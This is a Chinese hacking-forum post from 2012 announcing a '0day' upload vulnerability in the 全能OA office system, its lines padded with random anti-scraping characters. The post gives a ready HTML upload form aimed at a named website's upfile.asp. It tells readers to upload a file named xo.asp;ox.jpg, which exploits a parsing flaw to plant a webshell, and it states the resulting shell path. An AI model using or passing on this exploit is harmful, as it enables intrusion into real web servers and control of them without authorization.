找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2155|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞
* F5 B7 u; `4 R1 t3 e, y$ [) Z  Z
系统介绍:6 C: C' g' j1 y3 V/ e/ _$ V% l

3 P" a: H% Q7 T8 s全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。$ x. J& |7 W+ h3 A0 `& c

4 V. t' A6 P# _5 l4 f/ A主要功能:
! j& |8 E5 Q( O公司通告 . H1 s: ?2 ^# b. s
工作计划
$ w# N! {% u/ C+ h+ y* v1 u2 J通讯助理 - M# D1 E+ g) q# {" @$ L
客户资源
4 h- G8 Y$ `. T5 A我的公文 " V1 m# X9 T  {
公文传阅 ( `* g) Z$ b. C7 b: x, \9 o
公共资源 & |5 W2 p0 W" R/ S
资源预约 ) Y/ `# [! W% X: U2 [# I
今日考勤
' ]/ S! l* w/ q0 }0 F) E个人计划
; t8 D& l7 B' }5 v  Q; l3 C% q个人通讯录
( Y  Y) o  b/ T1 m% _- ~; r4 v个人基本档案
& T% ?& X5 E2 s/ K& r( T8 F% {( [未读邮件
6 Q; s) L' e+ m: Y0 ?发邮件 . F# ]* q4 U" ]0 r7 H( a$ g
收件夹
  z3 w8 c4 b# i4 p& n/ i2 V& K) `寄件夹
  g( x) S9 N0 U# `网络硬盘 8 w+ j0 h7 t2 C% l8 |& t% Q8 H6 o  u
网络会议 ' V9 ~0 Q6 G5 o0 p  v
网络调查
, H2 }2 W: N; Y交流论坛8 M% T' i4 Z3 |3 z/ \6 ^

) S$ T" S3 ]5 J2 e3 z8 O有兴趣测试的朋友可以下源码看看; `& W0 P, y2 W! T! ]" L5 J6 A

! y; f( q7 l, X1 f源码下载:
$ z  X) k$ r9 E1 H0 x
$ p5 o7 S* R; r$ K3 _8 E5 u7 Uhttp://www.mycodes.net/30/4750.htm
" ]3 W1 M" c3 m1 q7 z/ J
- Q, E. l! e+ R- s: o6 Z漏洞介绍:
, K8 S& v+ e8 ]
- G, y2 f/ q1 _+ [: F由upfile.asp上传文件漏洞引起
/ H7 f+ d! ^+ p) {
; o8 ^4 Z1 B7 E$ G测试方法:
$ m8 `8 i4 N. [) @* x
! J+ k$ ^8 r6 A8 i" O# b+ q使用名小子上传http://www.itlynn.com/upfile.asp即可
; |% F- g0 @2 H0 c8 M# \) z7 V, F1 t) T7 q) U! _, _
如果upfile.asp文件被删除不存在。* C0 {+ ]+ E5 o  ~: K% O

. h9 F2 G# y0 K$ M( W5 P, |  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp
) Z" O6 W5 D4 o/ i; F0 G/ ]1 e7 M( t' O
如果存在那么将如下代码保存为upfile.html。5 k$ J+ A1 z2 v. Z% R
' Y# O% \' o) z" a
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp
) r1 ~+ D: m$ T' n
3 J8 ?% J. t, ?; @# d/ F* O2 P
7 @! [8 d2 D* o, h; j4 x+ w6 D& i3 F' |9 f9 R, ~) f
01 <table border='0' align="center" cellpadding="5">
9 L* @6 {8 F, E) `3 m$ N
  ~/ ?1 L6 c5 |! x1 y4 @0 e! c3 K02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> ) ^+ S6 \' N, \  O
* `; ~( H( p+ ^/ E
03 <tr> & F4 J! s2 u- Y+ ^9 {# R
. m& g1 l+ j) G1 E$ J) X+ b: \- [
04             <td>报错:</td>
4 S8 s6 o1 m1 a/ @2 M) O) x2 O
; {/ A  B: X. f( B6 L05             <td><input type='radio' name='errnumber' value='0'>
: l! q5 s4 v) g( H
% W! F) S$ [( _7 t) |, Q( ^! P06               自动更名 - E3 J2 S+ G; ~1 f( r

; Z1 ~) ?* r5 y# u; p6 Y07               <input type='radio' name='errnumber' value='1' checked> 1 y) E/ U& y' X, U2 y0 A" n

) V4 i' d5 G4 m* d0 D1 m08               报错方式
3 z4 X: g* W  }' J' {
# [# u5 a  P' H09               <input type='radio' name='errnumber' value='2'>
: u# ?; b$ D1 g; ~$ G# X1 t2 @! V. T+ X7 @% x5 e/ ^3 x, N
10               直接覆盖</td> * [( {7 W( \, {

% M6 a; j0 E) v$ h# c11           </tr>
/ r. [4 K# T8 X0 u4 c7 r4 f; D
9 r) v9 E1 v0 k  v  l12           <tr> , i; ^: O3 n) \  r% ]6 x' {6 v& p

+ A; l) v8 n+ v" a7 B13             <td>主题:</td>
$ ]% v9 d: Q" P# v" m* |: X
% q* l4 \% u; Y0 W6 a: _, ?9 l1 M. }14             <td><input type='text' name='filename' size='30'></td> 8 W) q, I& O# y& b4 {
$ R9 |* p  D/ R, e$ c; r
15           </tr>
, J7 D$ X: H; X7 U" b# Y2 H
6 p* C0 _7 L8 S" C4 m' m% F9 d16           <tr>
0 z( N" x, i: |5 G, d' N$ r0 s) p$ A
17             <td>文件:</td>
& M5 T; v. p% t) }5 V& l! w6 c  f( }/ O3 t5 |) k
18             <td><input type="file"name="fruit"size="30"></td>
/ g% [/ B9 j( z: E0 T  ^3 H& B7 N( Q- x! t7 t4 D; E9 ~
19           </tr> $ G& U0 ]- u* C- P

% @, o2 R4 i) m# i; A/ ^) B2 g20           <tr>
, N# E8 G3 \* y* }. f& Z
2 |/ i8 R/ [& C3 l* U21             <td valign='top'>简介:</td> % v% U+ C4 y4 M% W2 S5 g) _

9 H# T' g0 C& S& x. F22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> + W; w+ S, S) _. {: T6 y4 Z
8 R: {- }3 M+ N3 S4 f" X
23           </tr> ) }4 [1 \; u+ K; g+ o

; }0 ~6 O8 w9 Y1 D% s' L% l24   ' H- v7 c2 s! d9 s' v, G
" H- y# N. i7 W, x1 j% N
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> % B! o' V# A7 f) R3 r9 T' G& l4 s

/ a2 d, o6 L4 U4 [9 G26           </tr>
7 K' Z, I7 @# C; ]3 B
( R. q. p% G4 E% Q' N27         </form> ! S. O6 r1 L. I9 J
) \4 T5 b5 J; A0 }; T- M# o# Z" H
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
- b1 N1 \1 f6 g' o: S, p
$ Z  v; F4 y: A' s( u & t" A: C, t3 U/ o3 v

) }* E% d- T$ i  l$ M" X1 ~0 }上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg. M2 x* b& ?5 u+ ]" C+ s
4 j2 N1 Z0 A7 k' v
此漏洞需要配合解析漏洞利用。- m) H; C$ y# n/ C( v
( J/ t- j3 z4 q$ B3 q9 L8 {* I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表